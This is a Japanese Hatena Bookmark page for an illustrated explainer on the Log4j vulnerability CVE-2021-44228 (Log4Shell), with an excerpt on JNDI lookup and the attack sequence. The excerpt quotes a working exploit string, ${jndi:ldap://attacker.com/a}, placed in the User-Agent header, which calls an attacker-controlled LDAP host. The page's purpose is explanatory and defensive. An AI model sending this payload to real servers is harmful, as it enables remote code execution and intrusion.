気に入った記事をブックマーク
- 気に入った記事を保存できます
保存した記事の一覧は、はてなブックマークで確認・編集ができます
- 記事を読んだ感想やメモを書き残せます
- 非公開でブックマークすることもできます
エントリーの編集
エントリーの編集は全ユーザーに共通の機能です。
必ずガイドラインを一読の上ご利用ください。
192 usersがブックマーク
1
1
【図解】Log4jの脆弱性 CVE-2021-44228 (Log4shell or LogJam) について
192 users
milestone-of-se.nesuke.com
milestone-of-se.nesuke.com
記事へのコメント1件
- 注目コメント
- 新着コメント
注目コメント算出アルゴリズムの一部にLINEヤフー株式会社の「建設的コメント順位付けモデルAPI」を使用しています
いまの話題をアプリでチェック!
- バナー広告なし
- ミュート機能あり
- ダークモード搭載
関連記事
【図解】Log4jの脆弱性 CVE-2021-44228 (Log4shell or LogJam) について
JNDI とはJava Naming and Directory Interface という、Java アプリケーションが DNS や LDAP 等のサー... JNDI とはJava Naming and Directory Interface という、Java アプリケーションが DNS や LDAP 等のサービスを利用するための汎用的なインタフェース (ライブラリ) です。 Log4j と JNDI lookupApache Software Foundation が開発した、Java ベースのロギングに関するライブラリです。JNDI lookup という機能があり、書き込んだログの一部を自動で変数化します。今回はこの機能が悪用されています。 CVE-2021-44228 の攻撃シーケンスの例 攻撃者は脆弱性をトリガーするために http ヘッダの User-Agent に ${jndi:ldap://attacker.com/a} という文字列を埋め込み、http リクエストを送信します。脆弱性のあるサーバの Java App はその通信を
ブックマークしたユーザー
すべてのユーザーの
詳細を表示します
詳細を表示します
milestone-of-se.nesuke.com
milestone-of-se.nesuke.com
milestone-of-se.nesuke.com
milestone-of-se.nesuke.com
www.hayaponlog.site
wakayamajisatu.jimdofree.com
nordot.app
www.gizmodo.jp
forest.watch.impress.co.jp
qiita.com/Sicut_study
togetter.com
tech-blog.monotaro.com
forest.watch.impress.co.jp
pc.watch.impress.co.jp
k-tai.watch.impress.co.jp
monoist.itmedia.co.jp
oan-ona007.at.webry.info
yosida95.hatenablog.com
2021/12/13 リンク